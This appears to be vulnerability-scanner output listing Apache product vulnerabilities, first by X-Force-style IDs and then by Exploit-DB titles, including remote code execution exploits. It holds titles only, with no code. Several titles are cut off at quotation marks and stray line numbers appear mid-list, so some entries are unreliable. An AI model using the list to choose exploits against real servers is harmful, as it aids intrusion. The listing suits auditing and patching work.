| [61202] Apache Derby BUILTIN authentication functionality information disclosure
| [61186] Apache CouchDB Futon cross-site request forgery
| [61169] Apache CXF DTD denial of service
| [61070] Apache Jackrabbit search.jsp SQL injection
| [61006] Apache SLMS Quoting cross-site request forgery
| [60962] Apache Tomcat time cross-site scripting
| [60883] Apache mod_proxy_http information disclosure
| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
| [60264] Apache Tomcat Transfer-Encoding denial of service
| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
| [59413] Apache mod_proxy_http timeout information disclosure
| [59058] Apache MyFaces unencrypted view state cross-site scripting
| [58827] Apache Axis2 xsd file include
| [58790] Apache Axis2 modules cross-site scripting
| [58299] Apache ActiveMQ queueBrowse cross-site scripting
| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
| [58056] Apache ActiveMQ .jsp source code disclosure
| [58055] Apache Tomcat realm name information disclosure
| [58046] Apache HTTP Server mod_auth_shadow security bypass
| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
| [57429] Apache CouchDB algorithms information disclosure
| [57398] Apache ActiveMQ Web console cross-site request forgery
| [57397] Apache ActiveMQ createDestination.action cross-site scripting
| [56653] Apache HTTP Server DNS spoofing
| [56652] Apache HTTP Server DNS cross-site scripting
| [56625] Apache HTTP Server request header information disclosure
| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
| [56623] Apache HTTP Server mod_proxy_ajp denial of service
| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
| [55857] Apache Tomcat WAR files directory traversal
| [55856] Apache Tomcat autoDeploy attribute security bypass
| [55855] Apache Tomcat WAR directory traversal
| [55210] Intuit component for Joomla! Apache information disclosure
| [54533] Apache Tomcat 404 error page cross-site scripting
| [54182] Apache Tomcat admin default password
| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
| [53666] Apache HTTP Server Solaris pollset support denial of service
| [53650] Apache HTTP Server HTTP basic-auth module security bypass
| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
| [53041] mod_proxy_ftp module for Apache denial of service
| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
| [51953] Apache Tomcat Path Disclosure
| [51952] Apache Tomcat Path Traversal
| [51951] Apache stronghold-status Information Disclosure
| [51950] Apache stronghold-info Information Disclosure
| [51949] Apache PHP Source Code Disclosure
| [51948] Apache Multiviews Attack
| [51946] Apache JServ Environment Status Information Disclosure
| [51945] Apache error_log Information Disclosure
| [51944] Apache Default Installation Page Pattern Found
| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
| [51942] Apache AXIS XML External Entity File Retrieval
| [51941] Apache AXIS Sample Servlet Information Leak
| [51940] Apache access_log Information Disclosure
| [51626] Apache mod_deflate denial of service
| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
| [51365] Apache Tomcat RequestDispatcher security bypass
| [51273] Apache HTTP Server Incomplete Request denial of service
| [51195] Apache Tomcat XML information disclosure
| [50994] Apache APR-util xml/apr_xml.c denial of service
| [50993] Apache APR-util apr_brigade_vprintf denial of service
| [50964] Apache APR-util apr_strmatch_precompile() denial of service
| [50930] Apache Tomcat j_security_check information disclosure
| [50928] Apache Tomcat AJP denial of service
| [50884] Apache HTTP Server XML ENTITY denial of service
| [50808] Apache HTTP Server AllowOverride privilege escalation
| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
| [50059] Apache mod_proxy_ajp information disclosure
| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
| [49921] Apache ActiveMQ Web interface cross-site scripting
| [49898] Apache Geronimo Services/Repository directory traversal
| [49725] Apache Tomcat mod_jk module information disclosure
| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
| [49712] Apache Struts unspecified cross-site scripting
| [49213] Apache Tomcat cal2.jsp cross-site scripting
| [48934] Apache Tomcat POST doRead method information disclosure
| [48211] Apache Tomcat header HTTP request smuggling
| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
| [47709] Apache Roller "
| [47104] Novell Netware ApacheAdmin console security bypass
| [47086] Apache HTTP Server OS fingerprinting unspecified
| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
| [45791] Apache Tomcat RemoteFilterValve security bypass
| [44435] Oracle WebLogic Apache Connector buffer overflow
| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
| [44156] Apache Tomcat RequestDispatcher directory traversal
| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
| [43885] Oracle WebLogic Server Apache Connector buffer overflow
| [42987] Apache HTTP Server mod_proxy module denial of service
| [42915] Apache Tomcat JSP files path disclosure
| [42914] Apache Tomcat MS-DOS path disclosure
| [42892] Apache Tomcat unspecified unauthorized access
| [42816] Apache Tomcat Host Manager cross-site scripting
| [42303] Apache 403 error cross-site scripting
| [41618] Apache-SSL ExpandCert() authentication bypass
| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
| [40614] Apache mod_jk2 HTTP Host header buffer overflow
| [40562] Apache Geronimo init information disclosure
| [40478] Novell Web Manager webadmin-apache.conf security bypass
| [40411] Apache Tomcat exception handling information disclosure
| [40409] Apache Tomcat native (APR based) connector weak security
| [40403] Apache Tomcat quotes and %5C cookie information disclosure
| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
| [39867] Apache HTTP Server mod_negotiation cross-site scripting
| [39804] Apache Tomcat SingleSignOn information disclosure
| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
| [39608] Apache HTTP Server balancer manager cross-site request forgery
| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
| [39472] Apache HTTP Server mod_status cross-site scripting
| [39201] Apache Tomcat JULI logging weak security
| [39158] Apache HTTP Server Windows SMB shares information disclosure
| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
| [38951] Apache::AuthCAS Perl module cookie SQL injection
| [38800] Apache HTTP Server 413 error page cross-site scripting
| [38211] Apache Geronimo SQLLoginModule authentication bypass
| [37243] Apache Tomcat WebDAV directory traversal
| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
| [36782] Apache Geronimo MEJB unauthorized access
| [36586] Apache HTTP Server UTF-7 cross-site scripting
| [36468] Apache Geronimo LoginModule security bypass
| [36467] Apache Tomcat functions.jsp cross-site scripting
| [36402] Apache Tomcat calendar cross-site request forgery
| [36354] Apache HTTP Server mod_proxy module denial of service
| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
| [36336] Apache Derby lock table privilege escalation
| [36335] Apache Derby schema privilege escalation
| [36006] Apache Tomcat "
| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
| [35999] Apache Tomcat \"
| [35795] Apache Tomcat CookieExample cross-site scripting
| [35536] Apache Tomcat SendMailServlet example cross-site scripting
| [35384] Apache HTTP Server mod_cache module denial of service
| [35097] Apache HTTP Server mod_status module cross-site scripting
| [35095] Apache HTTP Server Prefork MPM module denial of service
| [34984] Apache HTTP Server recall_headers information disclosure
| [34966] Apache HTTP Server MPM content spoofing
| [34965] Apache HTTP Server MPM information disclosure
| [34963] Apache HTTP Server MPM multiple denial of service
| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
| [34869] Apache Tomcat JSP example Web application cross-site scripting
| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
| [34496] Apache Tomcat JK Connector security bypass
| [34377] Apache Tomcat hello.jsp cross-site scripting
| [34212] Apache Tomcat SSL configuration security bypass
| [34210] Apache Tomcat Accept-Language cross-site scripting
| [34209] Apache Tomcat calendar application cross-site scripting
| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
| [34167] Apache Axis WSDL file path disclosure
| [34068] Apache Tomcat AJP connector information disclosure
| [33584] Apache HTTP Server suEXEC privilege escalation
| [32988] Apache Tomcat proxy module directory traversal
| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
| [32708] Debian Apache tty privilege escalation
| [32441] ApacheStats extract() PHP call unspecified
| [32128] Apache Tomcat default account
| [31680] Apache Tomcat RequestParamExample cross-site scripting
| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
| [30456] Apache mod_auth_kerb off-by-one buffer overflow
| [29550] Apache mod_tcl set_var() format string
| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
| [28357] Apache HTTP Server mod_alias script source information disclosure
| [28063] Apache mod_rewrite off-by-one buffer overflow
| [27902] Apache Tomcat URL information disclosure
| [26786] Apache James SMTP server denial of service
| [25680] libapache2 /tmp/svn file upload
| [25614] Apache Struts lookupMap cross-site scripting
| [25613] Apache Struts ActionForm denial of service
| [25612] Apache Struts isCancelled() security bypass
| [24965] Apache mod_python FileSession command execution
| [24716] Apache James spooler memory leak denial of service
| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
| [24158] Apache Geronimo jsp-examples cross-site scripting
| [24030] Apache auth_ldap module multiple format strings
| [24008] Apache mod_ssl custom error message denial of service
| [24003] Apache mod_auth_pgsql module multiple syslog format strings
| [23612] Apache mod_imap referer field cross-site scripting
| [23173] Apache Struts error message cross-site scripting
| [22942] Apache Tomcat directory listing denial of service
| [22858] Apache Multi-Processing Module code allows denial of service
| [22602] RHSA-2005:582 updates for Apache httpd not installed
| [22520] Apache mod-auth-shadow "
| [22466] ApacheTop symlink
| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
| [22006] Apache HTTP Server byte-range filter denial of service
| [21567] Apache mod_ssl off-by-one buffer overflow
| [21195] Apache HTTP Server header HTTP request smuggling
| [20383] Apache HTTP Server htdigest buffer overflow
| [19681] Apache Tomcat AJP12 request denial of service
| [18993] Apache HTTP server check_forensic symlink attack
7546| [18790] Apache Tomcat Manager cross-site scripting
7547| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
7548| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
7549| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
7550| [17961] Apache Web server ServerTokens has not been set
7551| [17930] Apache HTTP Server HTTP GET request denial of service
7552| [17785] Apache mod_include module buffer overflow
7553| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
7554| [17473] Apache HTTP Server Satisfy directive allows access to resources
7555| [17413] Apache htpasswd buffer overflow
7556| [17384] Apache HTTP Server environment variable configuration file buffer overflow
7557| [17382] Apache HTTP Server IPv6 apr_util denial of service
7558| [17366] Apache HTTP Server mod_dav module LOCK denial of service
7559| [17273] Apache HTTP Server speculative mode denial of service
7560| [17200] Apache HTTP Server mod_ssl denial of service
7561| [16890] Apache HTTP Server server-info request has been detected
7562| [16889] Apache HTTP Server server-status request has been detected
7563| [16705] Apache mod_ssl format string attack
7564| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
7565| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
7566| [16230] Apache HTTP Server PHP denial of service
7567| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
7568| [15958] Apache HTTP Server authentication modules memory corruption
7569| [15547] Apache HTTP Server mod_disk_cache local information disclosure
7570| [15540] Apache HTTP Server socket starvation denial of service
7571| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
7572| [15422] Apache HTTP Server mod_access information disclosure
7573| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
7574| [15293] Apache for Cygwin "
7575| [15065] Apache-SSL has a default password
7576| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
7577| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
7578| [14751] Apache Mod_python output filter information disclosure
7579| [14125] Apache HTTP Server mod_userdir module information disclosure
7580| [14075] Apache HTTP Server mod_php file descriptor leak
7581| [13703] Apache HTTP Server account
7582| [13689] Apache HTTP Server configuration allows symlinks
7583| [13688] Apache HTTP Server configuration allows SSI
7584| [13687] Apache HTTP Server Server: header value
7585| [13685] Apache HTTP Server ServerTokens value
7586| [13684] Apache HTTP Server ServerSignature value
7587| [13672] Apache HTTP Server config allows directory autoindexing
7588| [13671] Apache HTTP Server default content
7589| [13670] Apache HTTP Server config file directive references outside content root
7590| [13668] Apache HTTP Server httpd not running in chroot environment
7591| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
7592| [13664] Apache HTTP Server config file contains ScriptAlias entry
7593| [13663] Apache HTTP Server CGI support modules loaded
7594| [13661] Apache HTTP Server config file contains AddHandler entry
7595| [13660] Apache HTTP Server 500 error page not CGI script
7596| [13659] Apache HTTP Server 413 error page not CGI script
7597| [13658] Apache HTTP Server 403 error page not CGI script
7598| [13657] Apache HTTP Server 401 error page not CGI script
7599| [13552] Apache HTTP Server mod_cgid module information disclosure
| [13550] Apache GET request directory traversal
| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
| [13429] Apache Tomcat non-HTTP request denial of service
| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
| [13295] Apache weak password encryption
| [13254] Apache Tomcat .jsp cross-site scripting
| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
| [12681] Apache HTTP Server mod_proxy could allow mail relaying
| [12662] Apache HTTP Server rotatelogs denial of service
| [12554] Apache Tomcat stores password in plain text
| [12553] Apache HTTP Server redirects and subrequests denial of service
| [12552] Apache HTTP Server FTP proxy server denial of service
| [12551] Apache HTTP Server prefork MPM denial of service
| [12550] Apache HTTP Server weaker than expected encryption
| [12549] Apache HTTP Server type-map file denial of service
| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
| [12091] Apache HTTP Server apr_password_validate denial of service
| [12090] Apache HTTP Server apr_psprintf code execution
| [11804] Apache HTTP Server mod_access_referer denial of service
| [11750] Apache HTTP Server could leak sensitive file descriptors
| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
| [11703] Apache long slash path allows directory listing
| [11695] Apache HTTP Server LF (Line Feed) denial of service
| [11694] Apache HTTP Server filestat.c denial of service
| [11438] Apache HTTP Server MIME message boundaries information disclosure
| [11412] Apache HTTP Server error log terminal escape sequence injection
| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
| [11195] Apache Tomcat web.xml could be used to read files
| [11194] Apache Tomcat URL appended with a null character could list directories
| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
| [11126] Apache HTTP Server illegal character file disclosure
| [11125] Apache HTTP Server DOS device name HTTP POST code execution
| [11124] Apache HTTP Server DOS device name denial of service
| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
| [10938] Apache HTTP Server printenv test CGI cross-site scripting
| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
| [10575] Apache mod_php module could allow an attacker to take over the httpd process
| [10499] Apache HTTP Server WebDAV HTTP POST view source
| [10457] Apache HTTP Server mod_ssl "
| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
| [10414] Apache HTTP Server htdigest multiple buffer overflows
| [10413] Apache HTTP Server htdigest temporary file race condition
| [10412] Apache HTTP Server htpasswd temporary file race condition
| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
| [10280] Apache HTTP Server shared memory scorecard overwrite
| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
| [10241] Apache HTTP Server Host: header cross-site scripting
| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
| [10208] Apache HTTP Server mod_dav denial of service
| [10206] HP VVOS Apache mod_ssl denial of service
| [10200] Apache HTTP Server stderr denial of service
| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
| [10098] Slapper worm targets OpenSSL/Apache systems
| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
| [9875] Apache HTTP Server .var file request could disclose installation path
| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
| [9623] Apache HTTP Server ap_log_rerror() path disclosure
| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
| [9396] Apache Tomcat null character to threads denial of service
| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
| [9249] Apache HTTP Server chunked encoding heap buffer overflow
| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
| [8932] Apache Tomcat example class information disclosure
| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
| [8400] Apache HTTP Server mod_frontpage buffer overflows
| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
| [8308] Apache "
| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
| [8119] Apache and PHP OPTIONS request reveals "
| [8054] Apache is running on the system
| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
| [7836] Apache HTTP Server log directory denial of service
| [7815] Apache for Windows "
| [7810] Apache HTTP request could result in unexpected behavior
| [7599] Apache Tomcat reveals installation path
| [7494] Apache "
| [7419] Apache Web Server could allow remote attackers to overwrite .log files
| [7363] Apache Web Server hidden HTTP requests
| [7249] Apache mod_proxy denial of service
| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
| [7059] Apache "
| [7057] Apache "
| [7056] Apache "
| [7055] Apache "
| [7054] Apache "
| [6997] Apache Jakarta Tomcat error message may reveal information
| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
| [6970] Apache crafted HTTP request could reveal the internal IP address
| [6921] Apache long slash path allows directory listing
| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
| [6527] Apache Web Server for Windows and OS2 denial of service
| [6316] Apache Jakarta Tomcat may reveal JSP source code
| [6305] Apache Jakarta Tomcat directory traversal
| [5926] Linux Apache symbolic link
| [5659] Apache Web server discloses files when used with php script
| [5310] Apache mod_rewrite allows attacker to view arbitrary files
| [5204] Apache WebDAV directory listings
| [5197] Apache Web server reveals CGI script source code
| [5160] Apache Jakarta Tomcat default installation
| [5099] Trustix Secure Linux installs Apache with world writable access
| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
| [4931] Apache source.asp example file allows users to write to files
| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
| [4205] Apache Jakarta Tomcat delivers file contents
| [2084] Apache on Debian by default serves the /usr/doc directory
| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
| [697] Apache HTTP server beck exploit
| [331] Apache cookies buffer overflow
|
| Exploit-DB - https://www.exploit-db.com:
| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
| [29859] Apache Roller OGNL Injection
| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
| [29290] Apache / PHP 5.x Remote Code Execution Exploit
| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
| [27096] Apache Geronimo 1.0 Error Page XSS
| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
| [25986] Plesk Apache Zeroday Remote Exploit
| [25980] Apache Struts includeParams Remote Code Execution
| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
| [24874] Apache Struts ParametersInterceptor Remote Code Execution
| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
| [21719] Apache 2.0 Path Disclosure Vulnerability
| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
| [20558] Apache 1.2 Web Server DoS Vulnerability
| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
| [19231] PHP apache_request_headers Function Buffer Overflow
| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
| [18442] Apache httpOnly Cookie Disclosure
| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
| [18221] Apache HTTP Server Denial of Service
| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
| [17691] Apache Struts < 2.2.0 - Remote Command Execution
| [16798] Apache mod_jk 1.2.20 Buffer Overflow
| [16782] Apache Win32 Chunked Encoding
| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
| [15319] Apache 2.2 (Windows) Local Denial of Service
| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
| [12330] Apache OFBiz - Multiple XSS
| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
